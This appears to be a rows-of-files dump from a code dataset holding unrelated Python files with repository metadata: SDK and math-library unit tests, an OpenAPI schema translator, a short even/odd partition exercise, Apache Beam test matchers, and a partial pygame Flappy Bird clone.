| 34.232877 | 124 | 0.666667 | 341 | 2,499 | 4.771261 | 0.307918 | 0.108175 | 0.044253 | 0.068838 | 0.476951 | 0.476951 | 0.476951 | 0.426552 | 0.303626 | 0.303626 | 0 | 0.046891 | 0.214886 | 2,499 | 72 | 125 | 34.708333 | 0.782365 | 0.229692 | 0 | 0.289474 | 0 | 0 | 0.043621 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.184211 | 0 | 0.289474 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37940bf72d979b6ddcf361e5f37474a801422c7b | 6,520 | py | Python | tests/plugins/test_types.py | prusse-martin/alfasim-sdk | f6992cb3c1c51e25bf55470508f406ee6c5a5e9b | [
"MIT"
] | 17 | 2019-02-04T12:58:10.000Z | 2021-07-16T12:36:23.000Z | tests/plugins/test_types.py | prusse-martin/alfasim-sdk | f6992cb3c1c51e25bf55470508f406ee6c5a5e9b | [
"MIT"
] | 201 | 2018-08-07T19:39:10.000Z | 2022-03-15T00:20:24.000Z | tests/plugins/test_types.py | prusse-martin/alfasim-sdk | f6992cb3c1c51e25bf55470508f406ee6c5a5e9b | [
"MIT"
] | 5 | 2019-06-07T15:45:34.000Z | 2021-10-13T18:49:52.000Z | import re
import pytest
from alfasim_sdk._internal.types import MultipleReference
from alfasim_sdk._internal.types import Reference
@pytest.mark.parametrize("expression_type", ["enable_expr", "visible_expr"])
def test_enable_expr_and_visible_expr(expression_type):
from alfasim_sdk._internal.types import String
inputs = {"value": "value", "caption": "caption", expression_type: ""}
with pytest.raises(TypeError, match=f"'{expression_type}' must be callable"):
String(**inputs)
def function_definition():
pass
valid_input_1 = {"value": "value", "caption": "caption", expression_type: None}
valid_input_2 = {
"value": "value",
"caption": "caption",
expression_type: function_definition,
}
String(**valid_input_1)
String(**valid_input_2)
def test_string():
from alfasim_sdk._internal.types import String
with pytest.raises(
TypeError, match="missing 1 required keyword-only argument: 'caption'"
):
String(value="acme")
with pytest.raises(
TypeError, match=re.escape("'caption' must be 'str' (got 1 that is a 'int')")
):
String(value="acme", caption=1)
with pytest.raises(
TypeError, match=re.escape("'value' must be 'str' (got 1 that is a 'int')")
):
String(value=1, caption="caption")
def test_enum():
from alfasim_sdk._internal.types import Enum
with pytest.raises(
TypeError, match="missing 1 required keyword-only argument: 'caption'"
):
Enum(values=["s"], initial="")
with pytest.raises(TypeError, match="values must be a list, got a 'str'."):
Enum(values="", caption="caption")
with pytest.raises(
TypeError, match="values must be a list of strings, the item '1' is a 'int'"
):
Enum(values=[1], caption="caption")
with pytest.raises(
ValueError, match='Enum type cannot have an empty string on field "values"'
):
Enum(values=[""], caption="caption")
enum = Enum(values=["value"], caption="caption")
assert enum.initial is None
enum = Enum(values=["value"], initial="value", caption="caption")
assert enum.initial == "value"
with pytest.raises(
TypeError, match="The initial condition must be within the declared values"
):
Enum(values=["value1, value2"], initial="", caption="caption")
@pytest.mark.parametrize("class_", [Reference, MultipleReference])
def test_reference(class_):
from alfasim_sdk._internal.types import TracerType
from alfasim_sdk._internal.models import data_model, container_model
@data_model(caption="caption")
class Data:
pass
@container_model(caption="caption", model=Data, icon="")
class DataContainer:
pass
class InvalidClass:
pass
with pytest.raises(
TypeError, match="missing 1 required keyword-only argument: 'caption'"
):
class_(ref_type="")
with pytest.raises(TypeError, match="ref_type must be a class"):
class_(ref_type="", caption="caption")
with pytest.raises(
TypeError,
match="ref_type must be an ALFAsim type or a class decorated with 'data_model'",
):
class_(ref_type=InvalidClass, caption="caption")
error_msg = "ref_type must be an ALFAsim type or a class decorated with 'data_model', got a class decorated with 'container_model'"
with pytest.raises(TypeError, match=error_msg):
class_(ref_type=DataContainer, caption="caption")
error_msg = "The container_type field must be given when ref_type is a class decorated with 'data_model'"
with pytest.raises(TypeError, match=error_msg):
class_(ref_type=Data, caption="caption")
with pytest.raises(ValueError, match='The field "container_type" cannot be empty'):
class_(ref_type=Data, container_type="", caption="caption")
assert (
class_(ref_type=Data, container_type="DataContainer", caption="caption")
is not None
)
assert class_(ref_type=TracerType, caption="caption") is not None
def test_quantity():
from alfasim_sdk._internal.types import Quantity
with pytest.raises(
TypeError, match="missing 1 required keyword-only argument: 'caption'"
):
Quantity(value="", unit="")
with pytest.raises(TypeError, match="'value' must be <class 'numbers.Real'>"):
Quantity(value="", unit="", caption="caption")
with pytest.raises(
TypeError, match=re.escape("'unit' must be 'str' (got 1 that is a 'int')")
):
Quantity(value=1, unit=1, caption="caption")
def test_table():
from alfasim_sdk._internal.types import Table
with pytest.raises(
TypeError, match="missing 1 required keyword-only argument: 'caption'"
):
Table(rows=[])
with pytest.raises(TypeError, match="rows must be a list with TableColumn."):
Table(rows=[], caption="caption")
with pytest.raises(TypeError, match="rows must be a list of TableColumn."):
Table(rows=[""], caption="caption")
def test_table_column():
from alfasim_sdk._internal.types import TableColumn, Quantity
with pytest.raises(
TypeError, match="value must be a Quantity, got a <class 'str'>."
):
TableColumn(id="id", value="")
column = TableColumn(
id="id", value=Quantity(value=1, unit="m", caption="CAPTION FOR COLUMN")
)
assert column.caption == column.value.caption
def test_boolean():
from alfasim_sdk._internal.types import Boolean
with pytest.raises(
TypeError, match="missing 1 required keyword-only argument: 'caption'"
):
Boolean(value="")
with pytest.raises(TypeError, match="'value' must be <class 'bool'"):
Boolean(value=1, caption="caption")
def test_file_content():
from alfasim_sdk._internal.types import FileContent
FileContent(caption="Test")
def test_tooltips():
from alfasim_sdk._internal.types import Boolean
field = Boolean(value=True, caption="caption")
assert field.tooltip == ""
field = Boolean(value=True, caption="caption", tooltip="Test123")
assert field.tooltip == "Test123"
expected_msg = re.escape(
"'tooltip' must be <class 'str'> (got 2 that is a <class 'int'>)."
)
with pytest.raises(TypeError, match=expected_msg):
Boolean(value=True, caption="caption", tooltip=2)
field = Boolean(value=True, caption="caption", tooltip="∩ ∪ ∫ ∬ ∭ ∮")
assert field.tooltip == "∩ ∪ ∫ ∬ ∭ ∮"
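# Hedged note (not part of the original file): these tests are collected and
# run with pytest, e.g. `pytest tests/plugins/test_types.py -k tooltips`.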
| 30.900474 | 135 | 0.661963 | 815 | 6,520 | 5.195092 | 0.146012 | 0.09589 | 0.094473 | 0.135805 | 0.608644 | 0.567785 | 0.392537 | 0.268068 | 0.258385 | 0.213982 | 0 | 0.006009 | 0.208742 | 6,520 | 210 | 136 | 31.047619 | 0.811204 | 0 | 0 | 0.293333 | 0 | 0.013333 | 0.258436 | 0 | 0 | 0 | 0 | 0 | 0.053333 | 1 | 0.073333 | false | 0.026667 | 0.1 | 0 | 0.193333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3794ba9a44060b3cd6e66adb831807d3aaf08691 | 6,153 | py | Python | math_signals/test/test_relation.py | Omnivanitate/sweep_design | 00c20066d83a2eebf8402294b413737f49a97564 | [
"MIT"
] | null | null | null | math_signals/test/test_relation.py | Omnivanitate/sweep_design | 00c20066d83a2eebf8402294b413737f49a97564 | [
"MIT"
] | null | null | null | math_signals/test/test_relation.py | Omnivanitate/sweep_design | 00c20066d83a2eebf8402294b413737f49a97564 | [
"MIT"
] | null | null | null | import unittest
import numpy as np
from scipy.integrate import cumulative_trapezoid
from numpy.testing import assert_array_equal
from math_signals.math_relation import Relation
from math_signals.defaults.base_structures import BaseXY
def pre_integr(x, y):
return BaseXY(x=x[1:], y=np.ones(x[1:].size))
class PreTestRelation:
@staticmethod
def pre_test_input(test_case: unittest.TestCase, relation_class: Relation):
input_data = [([1, 2, 3, 4, 5], [10, 20, 30, 40, 50]),
(np.array([1, 2, 3, 4, 5]), np.array([10, 20, 30, 40, 50])),
(np.array([1, 2, 3, 4, 5]), [10, 20, 30, 40, 50]),
([1, 2, 3, 4, 5], np.array([10, 20, 30, 40, 50]))
]
for k in input_data:
with test_case.subTest(k=k):
r = relation_class(*k) # type: Relation
result_x, result_y = r.get_data()
assert_array_equal(result_x, np.array(k[0]))
assert_array_equal(result_y, np.array(k[1]))
input_data_2 = [[[1, 2, 3, 4, 5], [10, 20, 30, 40, 50]],
([1, 2, 3, 4, 5], [10, 20, 30, 40, 50]),
{'x': [1, 2, 3, 4, 5], 'y':[10, 20, 30, 40, 50]}]
for k in input_data_2:
with test_case.subTest(k=k):
r = relation_class(k) # type: Relation
result_x, result_y = r.get_data()
if isinstance(k, dict):
k = list(k.values())
assert_array_equal(result_x, np.array(k[0]))
assert_array_equal(result_y, np.array(k[1]))
@staticmethod
def pre_test_math(test_case: unittest.TestCase, relation_class: Relation):
x = np.array([1, 2, 3, 4, 5], dtype='float')
y1 = np.array([10, 20, 30, 40, 50], dtype='float')
y2 = np.array([2, 4, 6, 8, 10], dtype='float')
r1 = relation_class(x, y1) # type: Relation
r2 = relation_class(x, y2) # type: Relation
operation = ['__add__', '__sub__', '__mul__', '__truediv__', '__pow__']
for m in operation:
for k in [(r2, y2), (2, 2)]:
with test_case.subTest(k=k, m=m):
math_check(r1, k[0], x, y1, k[1], m)
@staticmethod
def pre_test_integrate_diff(test_case: unittest.TestCase, relation_class: Relation):
x = np.array([1, 2, 3, 4, 5, 6])
y = np.array([10, 20, 30, 40, 50, 60])
r = relation_class(x, y) # type: Relation
dr = r.diff()
dx, dy = dr.get_data()
assert_array_equal(dx, x[:-1]+(x[1]-x[0])/2)
assert_array_equal(dy, np.diff(y))
d2r = r.diff().diff()
d2x, d2y = d2r.get_data()
assert_array_equal(d2x, x[:-2]+x[1]-x[0])
assert_array_equal(d2y, np.diff(np.diff(y)))
ir = r.integrate()
ix, iy = ir.get_data()
assert_array_equal(ix, x[1:])
assert_array_equal(iy, cumulative_trapezoid(y))
i2r = r.integrate().integrate()
i2x, i2y = i2r.get_data()
assert_array_equal(x[2:], i2x)
assert_array_equal(i2y, cumulative_trapezoid(cumulative_trapezoid(y)))
same_r = r.integrate().integrate().diff().diff()
same_x, same_y = same_r.get_data()
assert_array_equal(same_x, x[3:-1])
assert_array_equal(same_y, y[3:-1])
same_r2 = r.integrate().diff().integrate().diff()
same_x2, same_y2 = same_r2.get_data()
assert_array_equal(same_x2, x[3:-1])
assert_array_equal(same_y2, y[3:-1])
@staticmethod
def pre_test_interpolate_extrapolate(test_case: unittest.TestCase, relation_class: Relation):
x = [1, 2, 3, 4, 5]
y = [10, 20, 30, 40, 50]
r = relation_class(x, y) # type: Relation
new_x = [1.1, 2.1, 3.1, 4.1, 5.1]
new_r = r.interpolate_extrapolate(new_x)
new_x2, new_y = new_r.get_data()
assert_array_equal(new_x, new_x2)
assert_array_equal(new_y, np.array([11., 21., 31., 41., 0.]))
@staticmethod
def pre_test_convolve_correlate(test_case: unittest.TestCase, r1, r2, relation_class: Relation):
rconv = relation_class.convolve(r1, r2)
test_case.assertIsInstance(rconv, relation_class)
rcorr = relation_class.correlate(r1, r2)
test_case.assertIsInstance(rcorr, relation_class)
@staticmethod
def pre_test_names(test_case: unittest.TestCase, relation_class: Relation, default_name: str):
r = relation_class([0, 1, 2], [0, 1, 2]) # type: Relation
test_case.assertEqual(r.get_name(), '{0}{1}'.format(default_name, r._quantity-1))
name = 'test'
r2 = relation_class([0, 1, 2], [1, 2, 3], name) # type: Relation
test_case.assertEqual(r2.get_name(), name)
class TestRelation(unittest.TestCase):
pre_cases = PreTestRelation
def test_input(self):
self.pre_cases.pre_test_input(self, Relation)
def test_math(self):
self.pre_cases.pre_test_math(self, Relation)
def test_integrate_diff(self):
self.pre_cases.pre_test_integrate_diff(self, Relation)
def test_interpolate_extrapolate(self):
self.pre_cases.pre_test_interpolate_extrapolate(self, Relation)
def test_conv_corr(self):
r1 = Relation([1, 2, 3, 4, 5], [10, 20, 30, 40, 50])
r2 = Relation([1, 2, 3, 4, 5], [10, 20, 30, 40, 50])
self.pre_cases.pre_test_convolve_correlate(self, r1, r2, Relation)
def math_check(r1, ry, x, y1, y, operation):
r = r1.__getattribute__(operation)(ry) # type: Relation
if operation != '__pow__':
y = y1.__getattribute__(operation)(y)
else:
if isinstance(y1, np.ndarray):
y = np.abs(y1).__getattribute__(operation)(y)*np.sign(y1)
else:
y = y1.__getattribute__(operation)(y)
result_x, result_y = r.get_data()
assert_array_equal(result_x, x)
assert_array_equal(result_y, y)
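# Hedged note (not part of the original file): the __pow__ branch above takes
# abs() before exponentiation and multiplies the sign back in afterwards, so a
# negative base with a fractional exponent, e.g. (-8) ** 0.5, is evaluated as
# -(8 ** 0.5) instead of producing NaN under numpy.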
| 39.191083 | 102 | 0.568178 | 874 | 6,153 | 3.74714 | 0.141876 | 0.070534 | 0.102595 | 0.014656 | 0.458321 | 0.342595 | 0.290382 | 0.214351 | 0.200611 | 0.200611 | 0 | 0.069203 | 0.290752 | 6,153 | 156 | 103 | 39.442308 | 0.681256 | 0.021778 | 0 | 0.170732 | 0 | 0 | 0.012474 | 0 | 0 | 0 | 0 | 0 | 0.203252 | 1 | 0.105691 | false | 0 | 0.04878 | 0.00813 | 0.186992 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3794d2cf81706b3a4b46cdb0956d6d92b0823772 | 4,910 | py | Python | nglp/lib/openapi.py | mauromsl/NGLP-Analytics | d6df05f82dbf2ffa5e136a20b6e89f7ef3bcbef2 | [
"MIT"
] | null | null | null | nglp/lib/openapi.py | mauromsl/NGLP-Analytics | d6df05f82dbf2ffa5e136a20b6e89f7ef3bcbef2 | [
"MIT"
] | 54 | 2021-04-28T05:14:45.000Z | 2021-12-10T09:14:28.000Z | nglp/lib/openapi.py | mauromsl/NGLP-Analytics | d6df05f82dbf2ffa5e136a20b6e89f7ef3bcbef2 | [
"MIT"
] | 1 | 2022-03-09T16:09:25.000Z | 2022-03-09T16:09:25.000Z | from copy import deepcopy
from nglp.lib.seamless import Construct, SeamlessException
class OpenAPISupport(object):
DEFAULT_OPENAPI_TRANS = {
# The default translation from our coerce to openapi is {"type": "string"}
# if there is no matching entry in the trans dict here.
"unicode": {"type": "string"},
"utcdatetime": {"type": "string", "format": "date-time"},
"integer": {"type": "integer"},
"bool": {"type": "boolean"},
"float": {"type": "float"},
"isolang": {"type": "string", "format": "isolang"},
"url": {"type": "string", "format": "url"},
"isolang_2letter": {"type": "string", "format": "isolang-alpha2"},
"country_code": {"type": "string", "format": "country_code"},
"currency_code": {"type": "string", "format": "currency_code"},
"license": {"type": "string", "format": "license_type"},
"persistent_identifier_scheme": {"type": "string", "format": "persistent_identifier_scheme"},
"format": {"type": "string", "format": "format"},
"deposit_policy": {"type": "string", "format": "deposit_policy"},
}
def __init__(self, openapi_trans=None):
self._openapi_trans = openapi_trans if openapi_trans is not None else deepcopy(self.DEFAULT_OPENAPI_TRANS)
# def struct_to_swag(self, struct, schema_title='', **kwargs):
# if not struct:
# if not self._struct:
# raise DataSchemaException("No struct to translate to Swagger.")
# struct = self._struct
#
#
# swag = {
# "properties": self.__struct_to_swag_properties(struct=struct, **kwargs)
# }
# required = deepcopy(struct.get('required', []))
# if len(required) > 0:
# swag["required"] = required
#
# if schema_title:
# swag['title'] = schema_title
#
# return swag
def request_body_section(self, struct):
return {
"requestBody" : {
"content" : {
"application/json" : {
"schema" : self.struct_to_jsonschema(struct)
}
}
}
}
def struct_to_jsonschema(self, struct, path=''):
'''A recursive function to translate the Seamless Struct to JSONSchema'''
if not (isinstance(struct, dict) or isinstance(struct, Construct)):
raise SeamlessException("The struct whose properties we're translating to JSONSchema should always be a dict-like object.")
swag_properties = {}
# convert simple fields
for simple_field, instructions in iter(struct.get('fields', {}).items()):
# no point adding to the path here, it's not gonna recurse any further from this field
swag_properties[simple_field] = self._openapi_trans.get(instructions['coerce'], {"type": "string"})
# convert objects
for obj in struct.get('objects', []):
newpath = obj if not path else path + '.' + obj
instructions = struct.get('structs', {}).get(obj, {})
swag_properties[obj] = {}
swag_properties[obj]['title'] = newpath
swag_properties[obj]['type'] = 'object'
swag_properties[obj]['properties'] = self.struct_to_jsonschema(struct=instructions, path=newpath)["properties"] # recursive call, process sub-struct(s)
required = deepcopy(instructions.get('required', []))
if len(required) > 0:
swag_properties[obj]['required'] = required
# convert lists
for l, instructions in iter(struct.get('lists', {}).items()):
newpath = l if not path else path + '.' + l
swag_properties[l] = {}
swag_properties[l]['type'] = 'array'
swag_properties[l]['items'] = {}
if instructions['contains'] == 'field':
swag_properties[l]['items'] = self._openapi_trans.get(instructions['coerce'], {"type": "string"})
elif instructions['contains'] == 'object':
swag_properties[l]['items']['type'] = 'object'
swag_properties[l]['items']['title'] = newpath
swag_properties[l]['items']['properties'] = self.struct_to_jsonschema(struct=struct.get('structs', {}).get(l, {}), path=newpath)["properties"] # recursive call, process sub-struct(s)
required = deepcopy(struct.get('structs', {}).get(l, {}).get('required', []))
if len(required) > 0:
swag_properties[l]['items']['required'] = required
else:
raise SeamlessException("Instructions for list {x} unclear. Conversion to JSONSchema only supports lists containing \"field\" and \"object\" items. Found: {y}".format(x=newpath, y=instructions['contains']))
return {"properties" : swag_properties}
| 46.761905 | 222 | 0.578411 | 506 | 4,910 | 5.476285 | 0.266798 | 0.090942 | 0.057741 | 0.043306 | 0.223385 | 0.148322 | 0.120895 | 0.110429 | 0.048358 | 0.048358 | 0 | 0.001395 | 0.270265 | 4,910 | 104 | 223 | 47.211538 | 0.771979 | 0.185336 | 0 | 0.03125 | 0 | 0 | 0.244142 | 0.014109 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046875 | false | 0 | 0.03125 | 0.015625 | 0.140625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37990b900d049794f3a0a486dc1c773935bc6ed9 | 584 | py | Python | 5_0_even_odd.py | ChuckChen2020/ElementsOfProgrammingInterviews | 635817bab6cddb397c45aa4b57c07a74b5ddb0a8 | [
"MIT"
] | null | null | null | 5_0_even_odd.py | ChuckChen2020/ElementsOfProgrammingInterviews | 635817bab6cddb397c45aa4b57c07a74b5ddb0a8 | [
"MIT"
] | null | null | null | 5_0_even_odd.py | ChuckChen2020/ElementsOfProgrammingInterviews | 635817bab6cddb397c45aa4b57c07a74b5ddb0a8 | [
"MIT"
] | null | null | null | def even_odd(A):
pe, po = 0, len(A) - 1
while pe < po:
if A[pe] % 2 == 0:
pe += 1
else:
# if pe hits an odd value, swap it with the entry at po. If po held 1) an even value, pe advances right on the next round and moves past it; 2) an odd value, it gets swapped again with the entry before the current po on a later round. Either way the even/odd partition is achieved naturally.
A[pe], A[po] = A[po], A[pe]
po -= 1
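def is_even_odd_partitioned(A):
    # Hedged helper, not part of the original solution: checks the
    # postcondition of even_odd -- every even entry precedes every odd one.
    seen_odd = False
    for v in A:
        if v % 2:
            seen_odd = True
        elif seen_odd:
            # an even value appearing after an odd one breaks the invariant
            return False
    return True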
if __name__ == '__main__':
A = [9, 6, 3, 7, 4, 2, 1, 5, 8, 0]
even_odd(A)
print(A)
| 36.5 | 302 | 0.556507 | 108 | 584 | 2.916667 | 0.509259 | 0.038095 | 0.050794 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046154 | 0.332192 | 584 | 15 | 303 | 38.933333 | 0.761538 | 0.493151 | 0 | 0 | 0 | 0 | 0.027211 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0 | 0 | 0.083333 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
379a96fa891f104347b8acc6017c208b33cfdbbb | 4,072 | py | Python | sdks/python/apache_beam/tests/pipeline_verifiers.py | chamikaramj/beam | 7c710360868d784c5b6bf99b8341748807b08101 | [
"Apache-2.0"
] | 1 | 2019-05-24T14:03:58.000Z | 2019-05-24T14:03:58.000Z | sdks/python/apache_beam/tests/pipeline_verifiers.py | kavyasmj/beam0.6 | d59dfeb339bd56feb7569531e5c421a297b0d3dc | [
"Apache-2.0"
] | 2 | 2017-04-24T20:32:25.000Z | 2022-03-29T12:59:55.000Z | sdks/python/apache_beam/tests/pipeline_verifiers.py | kavyasmj/beam0.6 | d59dfeb339bd56feb7569531e5c421a297b0d3dc | [
"Apache-2.0"
] | 2 | 2019-03-04T02:12:46.000Z | 2021-08-10T20:29:37.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""End-to-end test result verifiers
A set of verifiers that are used in end-to-end tests to verify state/output
of test pipeline job. Customized verifier should extend
`hamcrest.core.base_matcher.BaseMatcher` and override _matches.
"""
import logging
from hamcrest.core.base_matcher import BaseMatcher
from apache_beam.io.fileio import ChannelFactory
from apache_beam.runners.runner import PipelineState
from apache_beam.tests import test_utils as utils
from apache_beam.utils import retry
try:
from apitools.base.py.exceptions import HttpError
except ImportError:
HttpError = None
MAX_RETRIES = 4
class PipelineStateMatcher(BaseMatcher):
"""Matcher that verify pipeline job terminated in expected state
Matcher compares the actual pipeline terminate state with expected.
By default, `PipelineState.DONE` is used as expected state.
"""
def __init__(self, expected_state=PipelineState.DONE):
self.expected_state = expected_state
def _matches(self, pipeline_result):
return pipeline_result.state == self.expected_state
def describe_to(self, description):
description \
.append_text("Test pipeline expected terminated in state: ") \
.append_text(self.expected_state)
def describe_mismatch(self, pipeline_result, mismatch_description):
mismatch_description \
.append_text("Test pipeline job terminated in state: ") \
.append_text(pipeline_result.state)
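# Hedged usage sketch (not part of the original module): matchers like the
# one above are consumed through hamcrest's assert_that in end-to-end tests,
# along these lines:
#
#   from hamcrest import assert_that
#   result = pipeline.run()
#   assert_that(result, PipelineStateMatcher(PipelineState.DONE))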
def retry_on_io_error_and_server_error(exception):
"""Filter allowing retries on file I/O errors and service error."""
if isinstance(exception, IOError) or \
(HttpError is not None and isinstance(exception, HttpError)):
return True
else:
return False
class FileChecksumMatcher(BaseMatcher):
"""Matcher that verifies file(s) content by comparing file checksum.
Use apache_beam.io.fileio to fetch file(s) from given path. File checksum
is a hash string computed from content of file(s).
"""
def __init__(self, file_path, expected_checksum):
self.file_path = file_path
self.expected_checksum = expected_checksum
@retry.with_exponential_backoff(
num_retries=MAX_RETRIES,
retry_filter=retry_on_io_error_and_server_error)
def _read_with_retry(self):
"""Read path with retry if I/O failed"""
read_lines = []
matched_path = ChannelFactory.glob(self.file_path)
if not matched_path:
raise IOError('No such file or directory: %s' % self.file_path)
for path in matched_path:
with ChannelFactory.open(path, 'r') as f:
for line in f:
read_lines.append(line)
return read_lines
def _matches(self, _):
# Read from given file(s) path
read_lines = self._read_with_retry()
# Compute checksum
self.checksum = utils.compute_hash(read_lines)
logging.info('Read from given path %s, %d lines, checksum: %s.',
self.file_path, len(read_lines), self.checksum)
return self.checksum == self.expected_checksum
def describe_to(self, description):
description \
.append_text("Expected checksum is ") \
.append_text(self.expected_checksum)
def describe_mismatch(self, pipeline_result, mismatch_description):
mismatch_description \
.append_text("Actual checksum is ") \
.append_text(self.checksum)
| 33.933333 | 75 | 0.747299 | 560 | 4,072 | 5.271429 | 0.328571 | 0.0271 | 0.020325 | 0.01084 | 0.176152 | 0.109756 | 0.109756 | 0.090786 | 0.057588 | 0.057588 | 0 | 0.001492 | 0.176817 | 4,072 | 119 | 76 | 34.218487 | 0.879177 | 0.370334 | 0 | 0.131148 | 0 | 0 | 0.080208 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.163934 | false | 0 | 0.131148 | 0.016393 | 0.409836 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
379d365c3b72852583302df9254d3e745ae62646 | 4,975 | py | Python | flappy.py | mrlmaia/myFlappyBird | 393421c6d33051e3e5f9fb9b872651e2e8615de3 | [
"MIT"
] | null | null | null | flappy.py | mrlmaia/myFlappyBird | 393421c6d33051e3e5f9fb9b872651e2e8615de3 | [
"MIT"
] | null | null | null | flappy.py | mrlmaia/myFlappyBird | 393421c6d33051e3e5f9fb9b872651e2e8615de3 | [
"MIT"
] | null | null | null | import pygame, random
from pygame.locals import *
SCREEN_WIDTH = 400
SCREEN_HEIGTH = 800
SPEED = 10
GRAVITY = 1
GAME_SPEED = 10
X = 0
Y = 1
GROUND_WIDTH = 2 * SCREEN_WIDTH
GROUND_HEIGHT = 100
PIPE_WIDTH = 80
PIPE_HEIGHT = 500
PIPE_GAP = 200
class Bird(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.images = [
pygame.image.load("assets/yellowbird-upflap.png").convert_alpha(),
pygame.image.load("assets/yellowbird-midflap.png").convert_alpha(),
pygame.image.load("assets/yellowbird-downflap.png").convert_alpha()
]
self.speed = SPEED
# Current image starts with 0 (upflap)
self.current_image = 0
self.image = pygame.image.load("assets/yellowbird-upflap.png").convert_alpha()
self.mask = pygame.mask.from_surface(self.image)
# rect tupla de 4
self.rect = self.image.get_rect()
self.rect[0] = (SCREEN_WIDTH / 2) - self.rect[2]
self.rect[1] = (SCREEN_HEIGTH / 2) - self.rect[3]
def update(self):
# Flapping wings
# Cycle between 0 and 3
self.current_image = (self.current_image + 1) % 3
self.image = self.images[self.current_image]
self.speed += GRAVITY
# Update height
self.rect[1] += self.speed
def bump(self):
self.speed = -SPEED
class Pipe(pygame.sprite.Sprite):
def __init__(self, inverted, xpos, ysize):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("assets/pipe-green.png").convert_alpha()
self.image = pygame.transform.scale(self.image,(PIPE_WIDTH,PIPE_HEIGHT))
self.rect = self.image.get_rect()
self.rect[X] = xpos
if inverted:
self.image = pygame.transform.flip(self.image, False, True)
self.rect[Y] = - (self.rect[3] - ysize)
else:
self.rect[Y] = SCREEN_HEIGTH - ysize
self.mask = pygame.mask.from_surface(self.image)
def update(self):
self.rect[X] -= GAME_SPEED
class Ground(pygame.sprite.Sprite):
def __init__(self, xpos):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("assets/base.png").convert_alpha()
self.image = pygame.transform.scale(self.image, (GROUND_WIDTH, GROUND_HEIGHT))
self.mask = pygame.mask.from_surface(self.image)
self.rect = self.image.get_rect()
self.rect[X] = xpos
self.rect[Y] = SCREEN_HEIGTH - GROUND_HEIGHT
def update(self):
# X axis
self.rect[X] -= GAME_SPEED
def is_off_screen(sprite):
return sprite.rect[X] < - (sprite.rect[2])
def get_random_pipes(xpos):
size = random.randint(100, 300)
pipe = Pipe(False, xpos, size)
pipe_inverted = Pipe(True, xpos, SCREEN_HEIGTH - size - PIPE_GAP)
return (pipe, pipe_inverted)
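def gap_is_constant(pipe, pipe_inverted):
    # Hedged check, not part of the original game: verifies that the two
    # pipes produced by get_random_pipes always leave a vertical opening of
    # exactly PIPE_GAP pixels between them, regardless of the random size.
    top_of_lower = pipe.rect[Y]
    bottom_of_upper = pipe_inverted.rect[Y] + PIPE_HEIGHT
    return top_of_lower - bottom_of_upper == PIPE_GAP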
pygame.init()
# display.set_mode() creates the game screen
# arguments: tuple with width and height
screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGTH))
BACKGROUND = pygame.image.load("assets/background-day.png")
# Changing the scale of the image
BACKGROUND = pygame.transform.scale(BACKGROUND, (SCREEN_WIDTH, SCREEN_HEIGTH))
bird_group = pygame.sprite.Group()
bird = Bird()
bird_group.add(bird)
ground_group = pygame.sprite.Group()
for i in range(2):
ground = Ground(i * GROUND_WIDTH)
ground_group.add(ground)
pipe_group = pygame.sprite.Group()
for i in range(2):
pipes = get_random_pipes(SCREEN_WIDTH * i + 600)
pipe_group.add(pipes[0])
pipe_group.add(pipes[1])
clock = pygame.time.Clock()
while True:
clock.tick(10)
for event in pygame.event.get():
# Determine what kind of event this is
if event.type == QUIT:
    pygame.quit()
    raise SystemExit
if event.type == KEYDOWN:
if event.key == K_SPACE:
bird.bump()
# For each frame blit background
screen.blit(BACKGROUND, (0,0))
